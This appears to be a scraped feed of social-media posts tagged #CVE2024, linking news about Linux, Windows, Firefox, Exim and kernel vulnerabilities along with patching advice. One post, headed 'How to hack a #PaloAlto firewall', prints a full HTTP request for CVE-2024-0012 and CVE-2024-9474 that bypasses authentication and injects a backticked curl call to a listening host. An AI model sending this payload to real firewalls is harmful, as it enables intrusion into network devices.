⚠️ Warning for Linux users: the CVE‑2024‑XXXXX vulnerability in the libc library allows theft of SSH keys and full access to servers.

🔑 The most important things to do now
- Update all distributions to the patched version.
- Enable two-factor authentication and reduce key file permissions.
- Monitor login logs for unusual activity.

#LinuxSecurity #SSH #CVE2024 #OpenSource #Privacy

🔗 https://news.google.com/rss/articles/CBMiVkFVX3lxTE5ReUltNTZEVXctVktmUGhVWXBSX2FERU9LM3gzYVlTZ1ZfbmNWSXZnSF9ETDdzZHZpZHgtUS1FWGpmZ055amVGY2w2TGZLT011TmxhLWtB?oc=5

🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated
Incident Report: CVE-2024-YIKES

A series of unfortunate events.

Andrew Nesbitt
Kernel-hack-drill and a new approach to exploiting CVE-2024-50264 in the Linux kernel

Some memory corruption bugs are much harder to exploit than others. They can involve race conditions, crash the system, and impose limitations that make a researcher's life difficult. Working with such fragile vulnerabilities demands significant time and effort. CVE-2024-50264 in the Linux kernel is one such hard bug, which received the Pwnie Award 2025 as the Best Privilege Escalation. In this article, I introduce my personal project kernel-hack-drill and show how it helped me to exploit CVE-2024-50264.

Alexander Popov
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
python strikes again

YouTube
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz
Windows 11 December Patch Tuesday Fixes 72 Flaws, One Zero-Day

Microsoft's December Windows Patch addresses 72 flaws, including an actively exploited zero-day flaw in the Common Log File System Driver.

CyberInsider

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/

#CVE20240012 #CVE20249474 #CVE #CVE2024

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

It'll be no surprise that 2024, 2023, 2022, and every other year of humanity's existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks firewall and SSLVPN offering, and as ever, we’re here to

watchTowr Labs

🚨 Did you know cyber espionage groups like Earth Simnavaz can remain undetected for months, exploiting vulnerabilities like CVE-2024-30088 to target critical infrastructure? 🔒

Tip: Always patch known vulnerabilities quickly—delaying can leave systems exposed to advanced threats like these!

How do you prioritize patch management in your organization? 🤔

Dive deeper into this evolving threat on our blog: https://guardiansofcyber.com/cybersecurity-news/earth-simnavaz-cyberattacks-exploiting-cve-2024-30088-to-target-uae-critical-infrastructure-with-stealthy-backdoors/

#Cybersecurity #GuardiansOfCyber #Guardians #APT #Vulnerability #ZeroDay #EarthSimnavaz #CyberThreats #CriticalInfrastructure #CVE2024

🚨 Did you know a simple animation bug could leave your entire browser vulnerable? The latest CVE-2024-9680 exploit targets Firefox and Thunderbird, allowing attackers to execute code without you even knowing! 😨

To stay safe: Update your browser ASAP and always keep auto-updates enabled. These tiny steps make a huge difference in staying protected. 🔒

Have you ever been caught off guard by an update you didn't take seriously? Share your stories below!

Read more about the vulnerability and how to protect yourself: https://guardiansofcyber.com/cybersecurity-news/critical-cve-2024-9680-firefox-and-thunderbird-vulnerabilities-exploited-in-the-wild-patch-now-to-prevent-code-execution-attacks/

#Cybersecurity #GuardiansOfCyber #Guardians #CVE2024 #FirefoxVulnerability #PatchNow #BrowserSecurity #CyberAlert #InfoSec #StaySafeOnline

Critical Exim vulnerability affects 1.5 million servers worldwide

A critical security vulnerability in the widely-used mail transfer agent (MTA) Exim has put over 1.5 million email servers at risk worldwide. This issue,

Stack Diary